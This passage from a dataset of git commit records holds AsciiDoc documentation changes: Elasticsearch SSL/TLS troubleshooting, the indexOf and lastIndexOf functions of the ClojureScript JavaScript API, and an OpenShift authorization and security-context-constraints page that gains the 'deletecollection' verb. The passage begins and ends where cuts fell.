information.\n\nYou can use another tool, such as `wget`, to test certificates. Alternatively, you can add the certificate for the\nsigning certificate authority to the MacOS system keychain, using a procedure similar to the one detailed at the\nhttp:\/\/support.apple.com\/kb\/PH14003[Apple knowledge base]. Be sure to add the signing CA's certificate and not the server's certificate.\n--\n\n[float]\n==== SSLHandshakeException causing connections to fail\n\nAn `SSLHandshakeException` will cause a connection to a node to fail and indicates that there is a configuration issue. Some of the\ncommon exceptions are shown below with tips on how to resolve these issues.\n\n`java.security.cert.CertificateException: No name matching node01.example.com found`::\n+\n--\nIndicates that a client connection was made to `node01.example.com` but the certificate returned did not contain the name `node01.example.com`.\nIn most cases, the issue can be resolved by ensuring the name is specified during certificate creation. For more information, see <<ssl-tls>>.\nAnother scenario is when the environment does not wish to use DNS names in certificates at all. In this scenario, all settings\nin `elasticsearch.yml` should only use IP addresses, including the `network.publish_host` setting.\n--\n\n`java.security.cert.CertificateException: No subject alternative names present`::\n+\n--\nIndicates that a client connection was made to an IP address but the returned certificate did not contain any `SubjectAlternativeName` entries.\nIP addresses are only used for hostname verification if they are specified as a `SubjectAlternativeName` during certificate creation. If the intent was to use IP addresses for hostname verification, then the certificate\nwill need to be regenerated with the appropriate IP address. See <<ssl-tls>>.\n--\n\n`javax.net.ssl.SSLHandshakeException: null cert chain` and `javax.net.ssl.SSLException: Received fatal alert: bad_certificate`::\n+\n--\nThe `SSLHandshakeException` above indicates that a self-signed certificate was returned by the client that is not trusted\nas it cannot be found in the `truststore` or `keystore`. 
The `SSLException` above is seen on the client side of the connection.\n--\n\n`sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target` and `javax.net.ssl.SSLException: Received fatal alert: certificate_unknown`::\n+\n--\nThe `SunCertPathBuilderException` above indicates that a certificate was returned during the handshake that is not trusted.\nThis message is seen on the client side of the connection. The `SSLException` above is seen on the server side of the\nconnection. The CA certificate that signed the returned certificate was not found in the `keystore` or `truststore` and\nneeds to be added to trust this certificate.\n--\n\n[float]\n==== Other SSL\/TLS related exceptions\n\nThere are other exceptions related to SSL that may be seen in the logs. Below you will find some common exceptions and their\nmeaning.\n\nWARN: received plaintext http traffic on a https channel, closing connection::\n+\n--\nIndicates that there was an incoming plaintext http request. This typically occurs when an external application attempts\nto make an unencrypted call to the REST interface. Please ensure that all applications are using `https` when calling the\nREST interface with SSL enabled.\n--\n\n`org.elasticsearch.common.netty.handler.ssl.NotSslRecordException: not an SSL\/TLS record:`::\n+\n--\nIndicates that there was incoming plaintext traffic on an SSL connection. This typically occurs when a node is not\nconfigured to use encrypted communication and tries to connect to nodes that are using encrypted communication. Please\nverify that all nodes are using the same setting for `xpack.security.transport.ssl.enabled`.\n--\n\n`java.io.StreamCorruptedException: invalid internal transport message format, got`::\n+\n--\nIndicates an issue with data received on the transport interface in an unknown format. This can happen when a node with\nencrypted communication enabled connects to a node that has encrypted communication disabled. Please verify that all\nnodes are using the same setting for `xpack.security.transport.ssl.enabled`.\n--\n\n`java.lang.IllegalArgumentException: empty text`::\n+\n--\nThe exception is typically seen when an `https` request is made to a node that is not using `https`. If `https` is desired,\nplease ensure the following setting is in `elasticsearch.yml`:\n\n[source,yaml]\n----------------\nxpack.security.http.ssl.enabled: true\n----------------\n--\n\nERROR: unsupported ciphers [...] were requested but cannot be used in this JVM::\n+\n--\nThis error occurs when an SSL\/TLS cipher suite is specified that cannot be supported by the JVM that Elasticsearch is running\nin. Security will try to use the specified cipher suites that are supported by this JVM. This error can occur when using\nthe Security defaults as some distributions of OpenJDK do not enable the PKCS11 provider by default. In this case, we\nrecommend consulting your JVM documentation for details on how to enable the PKCS11 provider.\n\nAnother common source of this error is requesting cipher suites that use encryption with a key length greater than 128 bits\nwhen running on an Oracle JDK. In this case, you will need to install the <<ciphers, JCE Unlimited Strength Jurisdiction Policy Files>>.\n--\n\n[float]\n==== Internal Server Error in Kibana\n\nIf the Security plugin is enabled in Elasticsearch but disabled in Kibana, you must\nstill set `elasticsearch.username` and `elasticsearch.password` in `kibana.yml`.\nOtherwise, Kibana cannot connect to Elasticsearch. 
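For example, a minimal `kibana.yml` snippet (the credential values here are placeholders to adapt):\n\n[source,yaml]\n----------------\nelasticsearch.username: \"kibana\"\nelasticsearch.password: \"changeme\"\n----------------\n\n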
In 5.1.1, omitting these settings results in an\n`UnhandledPromiseRejectionWarning` and Kibana displays an Internal Server Error.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a8dd8e5281fbd05d2624f36aa8128ad1f44fc8c4","subject":"Minor tweak to JavaScript API introduction","message":"Minor tweak to JavaScript API introduction\n\nI found it confusing that this described the \"JavaScript API\" and then all the examples were in ClojureScript. I also found referring to \"ClojureScript types\" a little confusing. Hopefully this conveys the intent.","repos":"clojure\/clojurescript-site","old_file":"content\/reference\/javascript-api.adoc","new_file":"content\/reference\/javascript-api.adoc","new_contents":"= JavaScript API\nMike Fikes\n2017-12-06\n:type: reference\n:toc: macro\n:icons: font\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\ntoc::[]\n\nThe implementation of ClojureScript collections defines several JavaScript functions\nthat can be called from ClojureScript using JavaScript interop or directly from\nJavaScript. This page describes those functions which are officially stable and \npublicly-consumable.\n\n[[indexOf]]\n=== indexOf\n\n==== Syntax\n\n[source,clojure]\n----\n(.indexOf coll search-value)\n(.indexOf coll search-value from-index)\n----\n\n==== Parameters\n\n`coll` - a collection satisfying the `sequential?` predicate.\n\n`search-value` - the value to search for.\n\n`from-index` - an optional starting index.\n\n==== Description\n\nGets the index of a value in a sequential collection, or `-1` if\nnot found. 
By default, search proceeds from the beginning, unless an\noptional starting index is supplied.\n\n==== Examples\n\n[source,clojure]\n----\n(.indexOf [1 2 3 5 7] 5) ;; 3\n(.indexOf [1 2 3 5 7] 4) ;; -1\n(.indexOf [1 2 3 5 2] 2 3) ;; 4\n----\n\n[[lastIndexOf]]\n=== lastIndexOf\n\n==== Syntax\n\n[source,clojure]\n----\n(.lastIndexOf coll search-value)\n(.lastIndexOf coll search-value from-index)\n----\n\n==== Parameters\n\n`coll` - a collection satisfying the `sequential?` predicate.\n\n`search-value` - the value to search for.\n\n`from-index` - an optional starting index.\n\n==== Description\n\nGets the last index of a value in a sequential collection, or `-1` if\nnot found. By default, search proceeds from the end, unless an\noptional starting index is supplied.\n\n==== Examples\n\n[source,clojure]\n----\n(.lastIndexOf [1 2 3 5 2 7] 2) ;; 4\n(.lastIndexOf [1 2 3 5 2 7] 4) ;; -1\n(.lastIndexOf [1 2 3 5 2 7] 2 3) ;; 1\n----\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"08a8ad6a4875f1598226984e39cc1369805ef54c","subject":"Added deletecollection to the verb list","message":"Added deletecollection to the verb list\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"architecture\/additional_concepts\/authorization.adoc","new_file":"architecture\/additional_concepts\/authorization.adoc","new_contents":"= Authorization\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\nAuthorization policies determine whether a user is allowed to perform a given\nlink:#action[action] within a project. This allows platform administrators to\nuse the link:#cluster-policy-and-local-policy[cluster policy] to control who has\nvarious access levels to the OpenShift platform itself and all projects. It also\nallows developers to use link:#cluster-policy-and-local-policy[local policy] to\ncontrol who has access to their\nlink:..\/core_concepts\/projects_and_users.html#projects[projects]. Note that\nauthorization is a separate step from link:authentication.html[authentication],\nwhich is more about determining the identity of who is taking the action.\n\nAuthorization is managed using:\n\n[cols=\"1,7\"]\n|===\n\n|[[rules-def]]*Rules* |Sets of permitted link:#action[verbs] on a set of\nlink:..\/core_concepts\/index.html[objects]. 
For example, whether something can\n`create` pods.\n\n|[[roles-def]]*Roles* |Collections of rules.\nlink:authentication.html#users-and-groups[Users and groups] can be associated\nwith, or _bound_ to, multiple link:#roles[roles] at the same time.\n\n|[[bindings]]*Bindings* |Associations between users and\/or groups with a\nlink:#roles[role].\n\n|===\n\nCluster administrators can visualize rules, roles, and bindings\nifdef::openshift-enterprise,openshift-origin[]\nlink:..\/..\/admin_guide\/manage_authorization_policy.html#viewing-roles-and-bindings[using\nthe CLI].\nendif::[]\nifdef::openshift-dedicated[]\nusing the CLI.\nendif::[]\nFor example, consider the following excerpt from viewing a policy, showing rule\nsets for the *admin* and *basic-user* link:#roles[default roles]:\n\n====\n\n[options=\"nowrap\"]\n----\nadmin\t\t\tVerbs\t\t\t\t\tResources\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tResource Names\tExtension\n\t\t\t[create delete get list update watch]\t[projects resourcegroup:exposedkube resourcegroup:exposedopenshift resourcegroup:granter secrets]\t\t\t\t[]\n\t\t\t[get list watch]\t\t\t[resourcegroup:allkube resourcegroup:allkube-status resourcegroup:allopenshift-status resourcegroup:policy]\t\t\t[]\nbasic-user\t\tVerbs\t\t\t\t\tResources\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tResource Names\tExtension\n\t\t\t[get]\t\t\t\t\t[users]\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t[~]\n\t\t\t[list]\t\t\t\t\t[projectrequests]\t\t\t\t\t\t\t\t\t\t\t\t\t\t[]\n\t\t\t[list]\t\t\t\t\t[projects]\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t[]\n\t\t\t[create]\t\t\t\t[subjectaccessreviews]\t\t\t\t\t\t\t\t\t\t\t\t\t\t[]\t\tIsPersonalSubjectAccessReview\n----\n====\n\nThe following excerpt from viewing policy bindings shows the above roles bound\nto various users and groups:\n\n====\n\n[options=\"nowrap\"]\n----\nRoleBinding[admins]:\n\t\t\t\tRole:\tadmin\n\t\t\t\tUsers:\t[alice system:admin]\n\t\t\t\tGroups:\t[]\nRoleBinding[basic-user]:\n\t\t\t\tRole:\tbasic-user\n\t\t\t\tUsers:\t[joe]\n\t\t\t\tGroups:\t[devel]\n----\n====\n\nThe relationships between the policy roles, policy bindings, users, and\ndevelopers are illustrated below.\n\nimage::authorization.png[OpenShift Authorization Policy]\n\n[[evaluating-authorization]]\n\n== Evaluating Authorization\n\nSeveral factors are combined to make the decision when OpenShift evaluates\nauthorization:\n\n[cols=\"1,7\"]\n|===\n\n|[[identity]]*Identity* |In the context of authorization, both the user name and\nlist of groups the user belongs to.\n\n|[[action]]*Action* a|The action being performed. In most cases, this consists of:\n\n[horizontal]\nProject:: The link:..\/core_concepts\/projects_and_users.html#projects[project]\nbeing accessed.\nVerb:: Can be `get`, `list`, `create`, `update`, `delete`, `deletecollection`, or `watch`.\nResource Name:: The API endpoint being accessed.\n\n|*Bindings* |The full list of link:#bindings[bindings].\n\n|===\n\nOpenShift evaluates authorizations using the following steps:\n\n. The identity and the project-scoped action are used to find all bindings that\napply to the user or their groups.\n. Bindings are used to locate all the roles that apply.\n. Roles are used to find all the rules that apply.\n. The action is checked against each rule to find a match.\n. If no matching rule is found, the action is then denied by default.\n\n[[cluster-policy-and-local-policy]]\n\n== Cluster Policy and Local Policy\nThere are two levels of authorization policy:\n\n[cols=\"1,4\"]\n|===\n\n|*Cluster policy* |link:#roles[Roles] and bindings that are applicable across\nall projects. 
Roles that exist in the cluster policy are considered _cluster\nroles_. Cluster bindings can only reference cluster roles.\n\n|*Local policy* |link:#roles[Roles] and bindings that are scoped to a given\nproject. Roles that exist only in a local policy are considered _local roles_.\nLocal bindings can reference both cluster and local roles.\n\n|===\n\nThis two-level hierarchy allows re-usability over multiple projects through the\ncluster policy while allowing customization inside of individual projects\nthrough local policies.\n\nDuring evaluation, both the cluster bindings and the local bindings are used.\nFor example:\n\n. Cluster-wide \"allow\" rules are checked.\n. Locally-bound \"allow\" rules are checked.\n. Deny by default.\n\n[[roles]]\n\n== Roles\nRoles are collections of policy link:#rules-def[rules], which are sets of\npermitted verbs that can be performed on a set of resources. OpenShift includes\na set of default roles that can be added to users and groups in the\nlink:#cluster-policy-and-local-policy[cluster policy] or in a\nlink:#cluster-policy-and-local-policy[local policy].\n\n[cols=\"1,4\",options=\"header\"]\n|===\n\n|Default Role |Description\n\n|*admin* |A project manager. If used in a\nlink:#cluster-policy-and-local-policy[local binding], an *admin* user will have\nrights to view any resource in the project and modify any resource in the\nproject except for role creation and quota. If the *cluster-admin* wants to\nallow an *admin* to modify roles, the *cluster-admin* must create a\nproject-scoped `*Policy*` object using JSON.\n\n|*basic-user* |A user that can get basic information about projects and users.\n\n|*cluster-admin* |A super-user that can perform any action in any project. When\ngranted to a user within a local policy, they have full control over quota and\nroles and every action on every resource in the project.\n\n|*cluster-status* |A user that can get basic cluster status information.\n\n|*edit* |A user that can modify most objects in a project, but does not have the\npower to view or modify roles or bindings.\n\n|*self-provisioner* |A user that can create their own projects.\n\n|*view* |A user who cannot make any modifications, but can see most objects in a\nproject. 
They cannot view or modify roles or bindings.\n\n|===\n\nTIP: Remember that link:authentication.html#users-and-groups[users\nand groups] can be associated with, or _bound_ to, multiple roles at the same\ntime.\n\nCluster administrators can visualize these roles, including a matrix of the\nverbs and resources with which each is associated, using the CLI to\nifdef::openshift-enterprise,openshift-origin[]\nlink:..\/..\/admin_guide\/manage_authorization_policy.html#viewing-cluster-roles[view\nthe cluster roles].\nendif::[]\nifdef::openshift-dedicated[]\nview the cluster roles.\nendif::[]\nAdditional *system:* roles are listed as well, which\nare used for various OpenShift system and component operations.\n\nBy default in a local policy, only the binding for the *admin* role is\nimmediately listed when using the CLI to\nifdef::openshift-enterprise,openshift-origin[]\nlink:..\/..\/admin_guide\/manage_authorization_policy.html#viewing-local-bindings[view\nlocal bindings].\nendif::[]\nifdef::openshift-dedicated[]\nview local bindings.\nendif::[]\nHowever, if other default roles are added to users and groups within a local\npolicy, they are listed in the CLI output as well.\n\nIf you find that these roles do not suit you, a *cluster-admin* user can create\na `*policyBinding*` object named `_<projectname>_:default` with the CLI using a\nJSON file. This allows the project *admin* to bind users to roles that are\ndefined only in the `_<projectname>_` local policy.\n\nifdef::openshift-enterprise,openshift-origin[]\n[[updating-cluster-roles]]\n\n=== Updating Cluster Roles\n\nAfter any link:..\/..\/install_config\/upgrading\/index.html[OpenShift cluster\nupgrade], the recommended default roles may have been updated. See\nlink:..\/..\/install_config\/upgrading\/manual_upgrades.html#updating-policy-definitions[Updating\nPolicy Definitions] for instructions on getting to the new recommendations\nusing:\n\n----\n$ oadm policy reconcile-cluster-roles\n----\nendif::[]\n\n[[security-context-constraints]]\n\n== Security Context Constraints\nIn addition to link:#overview[authorization policies] that control what a user\ncan do, OpenShift provides _security context constraints_ (SCC) that control the\nactions that a link:..\/core_concepts\/pods_and_services.html#pods[pod] can\nperform and what it has the ability to access. Administrators can\nlink:..\/..\/admin_guide\/manage_scc.html[manage SCCs] using the CLI.\nSCCs are also very useful for\nlink:..\/..\/install_config\/persistent_storage\/pod_security_context.html[managing\naccess to persistent storage].\n\nSCCs are objects that define a set of conditions that a pod must run with in\norder to be accepted into the system. They allow an administrator to control the\nfollowing:\n\nifdef::openshift-enterprise,openshift-origin[]\n. Running of\nlink:..\/..\/install_config\/install\/prerequisites.html#security-warning[privileged\ncontainers].\nendif::[]\nifdef::openshift-dedicated[]\n. Running of privileged containers.\nendif::[]\n. Capabilities a container can request to be added.\n. Use of host directories as volumes.\n. The SELinux context of the container.\n. The user ID.\n. The use of host namespaces and networking.\n. Allocating an `*FSGroup*` that owns the pod's volumes\n. 
Configuring allowable supplemental groups\n\nSix SCCs are added to the cluster by default, and are viewable by cluster\nadministrators using the CLI:\n\n====\n----\n$ oc get scc\nNAME PRIV CAPS HOSTDIR SELINUX RUNASUSER FSGROUP SUPGROUP PRIORITY\nanyuid false [] false MustRunAs RunAsAny RunAsAny RunAsAny 10\nhostaccess false [] true MustRunAs MustRunAsRange RunAsAny RunAsAny <none>\nhostmount-anyuid false [] true MustRunAs RunAsAny RunAsAny RunAsAny <none>\nnonroot false [] false MustRunAs MustRunAsNonRoot RunAsAny RunAsAny <none>\nprivileged true [] true RunAsAny RunAsAny RunAsAny RunAsAny <none>\nrestricted false [] false MustRunAs MustRunAsRange RunAsAny RunAsAny <none>\n----\n====\n\nThe definition for each SCC is also viewable by cluster administrators using the\nCLI. For example, for the privileged SCC:\n\n====\n----\n# oc export scc\/privileged\n\nallowHostDirVolumePlugin: true\nallowHostIPC: true\nallowHostNetwork: true\nallowHostPID: true\nallowHostPorts: true\nallowPrivilegedContainer: true\nallowedCapabilities: null\napiVersion: v1\nfsGroup: <1>\n type: RunAsAny\ngroups: <2>\n- system:cluster-admins\n- system:nodes\nkind: SecurityContextConstraints\nmetadata:\n annotations:\n kubernetes.io\/description: 'privileged allows access to all privileged and host\n features and the ability to run as any user, any group, any fsGroup, and with\n any SELinux context. WARNING: this is the most relaxed SCC and should be used\n only for cluster administration. Grant with caution.'\n creationTimestamp: null\n name: privileged\npriority: null\nrunAsUser: <3>\n type: RunAsAny\nseLinuxContext: <4>\n type: RunAsAny\nsupplementalGroups: <5>\n type: RunAsAny\nusers: <6>\n- system:serviceaccount:default:registry\n- system:serviceaccount:default:router\n- system:serviceaccount:openshift-infra:build-controller\n----\n\n<1> The `*FSGroup*` strategy which dictates the allowable values for the\nSecurity Context\n<2> The groups that have access to this SCC\n<3> The run as user strategy type which dictates the allowable values for the\nSecurity Context\n<4> The SELinux context strategy type which dictates the allowable values for\nthe Security Context\n<5> The supplemental groups strategy which dictates the allowable supplemental\ngroups for the Security Context\n<6> The users who have access to this SCC\n\n====\n\nThe `*users*` and `*groups*` fields on the SCC control which SCCs can be used.\nBy default, cluster administrators, nodes, and the build controller are granted\naccess to the privileged SCC. All authenticated users are granted access to the\nrestricted SCC.\n\nThe privileged SCC:\n\n- allows privileged pods.\n- allows host directories to be mounted as volumes.\n- allows a pod to run as any user.\n- allows a pod to run with any MCS label.\n- allows a pod to use the host's IPC namespace.\n- allows a pod to use the host's PID namespace.\n- allows a pod to use any FSGroup.\n- allows a pod to use any supplemental group.\n\nThe restricted SCC:\n\n- ensures pods cannot run as privileged.\n- ensures pods cannot use host directory volumes.\n- requires that a pod run as a user in a pre-allocated range of UIDs.\n- requires that a pod run with a pre-allocated MCS label.\n- allows a pod to use any FSGroup.\n- allows a pod to use any supplemental group.\n\n[NOTE]\n====\nFor more information about each SCC, see the *kubernetes.io\/description*\nannotation available on the SCC.\n====\n\nSCCs are comprised of settings and strategies that control the security features\na pod has access to. 
These settings fall into three categories:\n\n[cols=\"1,4\"]\n|===\n\n|*Controlled by a boolean*\n|Fields of this type default to the most restrictive value. For example,\n`*AllowPrivilegedContainer*` is always set to *false* if unspecified.\n\n|*Controlled by an allowable set*\n|Fields of this type are checked against the set to ensure their value is\nallowed.\n\n|*Controlled by a strategy*\na|Items that have a strategy to generate a value provide:\n\n- A mechanism to generate the value, and\n- A mechanism to ensure that a specified value falls into the set of allowable\nvalues.\n\n|===\n\n=== SCC Strategies\n\n==== RunAsUser\n\n. *MustRunAs* - Requires a `*runAsUser*` to be configured. Uses the configured\n`*runAsUser*` as the default. Validates against the configured `*runAsUser*`.\n. *MustRunAsRange* - Requires minimum and maximum values to be defined if not\nusing pre-allocated values. Uses the minimum as the default. Validates against\nthe entire allowable range.\n. *MustRunAsNonRoot* - Requires that the pod be submitted with a non-zero\n`*runAsUser*` or have the `USER` directive defined in the image. No default\nprovided.\n. *RunAsAny* - No default provided. Allows any `*runAsUser*` to be specified.\n\n==== SELinuxContext\n\n. *MustRunAs* - Requires `*seLinuxOptions*` to be configured if not using\npre-allocated values. Uses `*seLinuxOptions*` as the default. Validates against\n`*seLinuxOptions*`.\n. *RunAsAny* - No default provided. Allows any `*seLinuxOptions*` to be\nspecified.\n\n==== SupplementalGroups\n\n. *MustRunAs* - Requires at least one range to be specified if not using\npre-allocated values. Uses the minimum value of the first range as the default.\nValidates against all ranges.\n. *RunAsAny* - No default provided. Allows any `*supplementalGroups*` to be\nspecified.\n\n==== FSGroup\n\n. *MustRunAs* - Requires at least one range to be specified if not using\npre-allocated values. Uses the minimum value of the first range as the default.\nValidates against the first ID in the first range.\n. *RunAsAny* - No default provided. Allows any `*fsGroup*` ID to be specified.\n\n\n[[admission]]\n\n=== Admission\n_Admission control_ with SCCs allows for control over the creation of resources\nbased on the capabilities granted to a user.\n\nIn terms of the SCCs, this means that an admission controller can inspect the\nuser information made available in the context to retrieve an appropriate set of\nSCCs. Doing so ensures the pod is authorized to make requests about its\noperating environment or to generate a set of constraints to apply to the pod.\n\nThe set of SCCs that admission uses to authorize a pod are determined by the\nuser identity and groups that the user belongs to. Additionally, if the pod\nspecifies a service account, the set of allowable SCCs includes any constraints\naccessible to the service account.\n\nAdmission uses the following approach to create the final security context for\nthe pod:\n\n. Retrieve all SCCs available for use.\n. Generate field values for security context settings that were not specified\non the request.\n. Validate the final settings against the available constraints.\n\nIf a matching set of constraints is found, then the pod is accepted. If the\nrequest cannot be matched to an SCC, the pod is rejected.\n\nA pod must validate every field against the SCC. 
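For illustration, here is a minimal sketch (an illustrative fragment, not taken from the product documentation) of the group-related fields in a pod specification that admission checks against the matching SCC strategies; the `*fsGroup*` and `*supplementalGroups*` values shown are hypothetical:\n\n====\n----\napiVersion: v1\nkind: Pod\nmetadata:\n  name: scc-example\nspec:\n  securityContext:\n    fsGroup: 1000                    # validated against the FSGroup strategy\n    supplementalGroups: [1000, 2000] # validated against the SupplementalGroups strategy\n  containers:\n  - name: app\n    image: example\/app # hypothetical image name\n----\n====\n\n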
The following are examples for\njust two of the fields that must be validated:\n\n[NOTE]\n====\nThese examples are in the context of a strategy using pre-allocated values.\n====\n\n*An FSGroup SCC Strategy of MustRunAs*\n\nIf the pod defines a `*fsGroup*` ID, then that ID must equal the default\n`*FSGroup*` ID. Otherwise, the pod is not validated by that SCC and the next SCC\nis evaluated. If the `*FSGroup*` strategy is *RunAsAny* and the pod omits a\n`*fsGroup*` ID, then the pod matches the SCC based on `*FSGroup*` (though other\nstrategies may not validate and thus cause the pod to fail).\n\n*A SupplementalGroups SCC Strategy of MustRunAs*\n\nIf the pod specification defines one or more `*SupplementalGroups*` IDs, then\nthe pod's IDs must equal one of the IDs in the namespace's\n*openshift.io\/sa.scc.supplemental-groups* annotation. Otherwise, the pod is not\nvalidated by that SCC and the next SCC is evaluated. If the\n`*SupplementalGroups*` setting is *RunAsAny* and the pod specification omits a\n`*SupplementalGroups*` ID, then the pod matches the SCC based on\n`*SupplementalGroups*` (though other strategies may not validate and thus cause\nthe pod to fail).\n\n==== SCC Prioritization\n\nSCCs have a priority field that affects the ordering used when the admission\ncontroller attempts to validate a request. A higher priority\nSCC is moved to the front of the set when sorting. When the complete set\nof available SCCs is determined, they are ordered by:\n\n. Highest priority first, nil is considered a 0 priority\n. If priorities are equal, the SCCs will be sorted from most restrictive to least restrictive\n. If both priorities and restrictions are equal, the SCCs will be sorted by name\n\nBy default, the anyuid SCC granted to cluster administrators is given priority\nin their SCC set. This allows cluster administrators to run pods as any\nuser without specifying a `RunAsUser` on the pod's `SecurityContext`. The\nadministrator may still specify a `RunAsUser` if they wish.\n\n==== Understanding Pre-allocated Values and Security Context Constraints\n\nThe admission controller is aware of certain conditions in the security context\nconstraints that trigger it to look up pre-allocated values from a namespace and\npopulate the security context constraint before processing the pod. Each SCC\nstrategy is evaluated independently of other strategies, with the pre-allocated\nvalues (where allowed) for each policy aggregated with pod specification values\nto make the final values for the various IDs defined in the running pod.\n\nThe following SCCs cause the admission controller to look for pre-allocated\nvalues when no ranges are defined in the pod specification:\n\n. A `*RunAsUser*` strategy of *MustRunAsRange* with no minimum or maximum set.\nAdmission looks for the *openshift.io\/sa.scc.uid-range* annotation to populate\nrange fields.\n. An `*SELinuxContext*` strategy of *MustRunAs* with no level set. Admission\nlooks for the *openshift.io\/sa.scc.mcs* annotation to populate the level.\n. A `*FSGroup*` strategy of *MustRunAs*. Admission looks for the\n*openshift.io\/sa.scc.supplemental-groups* annotation.\n. A `*SupplementalGroups*` strategy of *MustRunAs*. Admission looks for the\n*openshift.io\/sa.scc.supplemental-groups* annotation.\n\nDuring the generation phase, the security context provider will default any\nvalues that are not specifically set in the pod. Defaulting is based on the\nstrategy being used:\n\n. 
`*RunAsAny*` and `*MustRunAsNonRoot*` strategies do not provide default\nvalues. Thus, if the pod needs a field defined (for example, a group ID), this\nfield must be defined inside the pod specification.\n. `*MustRunAs*` (single value) strategies provide a default value which is\nalways used. As an example, for group IDs: even if the pod specification defines\nits own ID value, the namespace's default field will also appear in the pod's\ngroups.\n. `*MustRunAsRange*` and `*MustRunAs*` (range-based) strategies provide the\nminimum value of the range. As with a single value `*MustRunAs*` strategy, the\nnamespace's default value will appear in the running pod. If a range-based\nstrategy is configurable with multiple ranges, it will provide the minimum value\nof the first configured range.\n\n[NOTE]\n====\n`*FSGroup*` and `*SupplementalGroups*` strategies fall back to the\n*openshift.io\/sa.scc.uid-range* annotation if the\n*openshift.io\/sa.scc.supplemental-groups* annotation does not exist on the\nnamespace. If neither exists, the SCC will fail to create.\n====\n\n[NOTE]\n====\nBy default, the annotation-based `*FSGroup*` strategy configures itself with a\nsingle range based on the minimum value for the annotation. For example, if your\nannotation reads *1\/3*, the `*FSGroup*` strategy will configure itself with a\nminimum and maximum of *1*. If you want to allow more groups to be accepted for\nthe `*FSGroup*` field, you can configure a custom SCC that does not use the\nannotation.\n====\n\n[NOTE]\n====\nThe *openshift.io\/sa.scc.supplemental-groups* annotation accepts a\ncomma-delimited list of blocks in the format of `<start>\/<length>` or\n`<start>-<end>`.\nThe *openshift.io\/sa.scc.uid-range* annotation accepts only a single block.\n====\n","old_contents":"= Authorization\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\nAuthorization policies determine whether a user is allowed to perform a given\nlink:#action[action] within a project. This allows platform administrators to\nuse the link:#cluster-policy-and-local-policy[cluster policy] to control who has\nvarious access levels to the OpenShift platform itself and all projects. It also\nallows developers to use link:#cluster-policy-and-local-policy[local policy] to\ncontrol who has access to their\nlink:..\/core_concepts\/projects_and_users.html#projects[projects]. Note that\nauthorization is a separate step from link:authentication.html[authentication],\nwhich is more about determining the identity of who is taking the action.\n\nAuthorization is managed using:\n\n[cols=\"1,7\"]\n|===\n\n|[[rules-def]]*Rules* |Sets of permitted link:#action[verbs] on a set of\nlink:..\/core_concepts\/index.html[objects]. 
For example, whether something can\n`create` pods.\n\n|[[roles-def]]*Roles* |Collections of rules.\nlink:authentication.html#users-and-groups[Users and groups] can be associated\nwith, or _bound_ to, multiple link:#roles[roles] at the same time.\n\n|[[bindings]]*Bindings* |Associations between users and\/or groups with a\nlink:#roles[role].\n\n|===\n\nCluster administrators can visualize rules, roles, and bindings\nifdef::openshift-enterprise,openshift-origin[]\nlink:..\/..\/admin_guide\/manage_authorization_policy.html#viewing-roles-and-bindings[using\nthe CLI].\nendif::[]\nifdef::openshift-dedicated[]\nusing the CLI.\nendif::[]\nFor example, consider the following excerpt from viewing a policy, showing rule\nsets for the *admin* and *basic-user* link:#roles[default roles]:\n\n====\n\n[options=\"nowrap\"]\n----\nadmin\t\t\tVerbs\t\t\t\t\tResources\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tResource Names\tExtension\n\t\t\t[create delete get list update watch]\t[projects resourcegroup:exposedkube resourcegroup:exposedopenshift resourcegroup:granter secrets]\t\t\t\t[]\n\t\t\t[get list watch]\t\t\t[resourcegroup:allkube resourcegroup:allkube-status resourcegroup:allopenshift-status resourcegroup:policy]\t\t\t[]\nbasic-user\t\tVerbs\t\t\t\t\tResources\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tResource Names\tExtension\n\t\t\t[get]\t\t\t\t\t[users]\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t[~]\n\t\t\t[list]\t\t\t\t\t[projectrequests]\t\t\t\t\t\t\t\t\t\t\t\t\t\t[]\n\t\t\t[list]\t\t\t\t\t[projects]\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t[]\n\t\t\t[create]\t\t\t\t[subjectaccessreviews]\t\t\t\t\t\t\t\t\t\t\t\t\t\t[]\t\tIsPersonalSubjectAccessReview\n----\n====\n\nThe following excerpt from viewing policy bindings shows the above roles bound\nto various users and groups:\n\n====\n\n[options=\"nowrap\"]\n----\nRoleBinding[admins]:\n\t\t\t\tRole:\tadmin\n\t\t\t\tUsers:\t[alice system:admin]\n\t\t\t\tGroups:\t[]\nRoleBinding[basic-user]:\n\t\t\t\tRole:\tbasic-user\n\t\t\t\tUsers:\t[joe]\n\t\t\t\tGroups:\t[devel]\n----\n====\n\nThe relationships between the the policy roles, policy bindings, users, and\ndevelopers are illustrated below.\n\nimage::authorization.png[OpenShift Authorization Policy]\n\n[[evaluating-authorization]]\n\n== Evaluating Authorization\n\nSeveral factors are combined to make the decision when OpenShift evaluates\nauthorization:\n\n[cols=\"1,7\"]\n|===\n\n|[[identity]]*Identity* |In the context of authorization, both the user name and\nlist of groups the user belongs to.\n\n|[[action]]*Action* a|The action being performed. In most cases, this consists of:\n\n[horizontal]\nProject:: The link:..\/core_concepts\/projects_and_users.html#projects[project]\nbeing accessed.\nVerb:: Can be `get`, `list`, `create`, `update`, `delete`, or `watch`.\nResource Name:: The API endpoint being accessed.\n\n|*Bindings* |The full list of link:#bindings[bindings].\n\n|===\n\nOpenShift evaluates authorizations using the following steps:\n\n. The identity and the project-scoped action is used to find all bindings that\napply to the user or their groups.\n. Bindings are used to locate all the roles that apply.\n. Roles are used to find all the rules that apply.\n. The action is checked against each rule to find a match.\n. If no matching rule is found, the action is then denied by default.\n\n[[cluster-policy-and-local-policy]]\n\n== Cluster Policy and Local 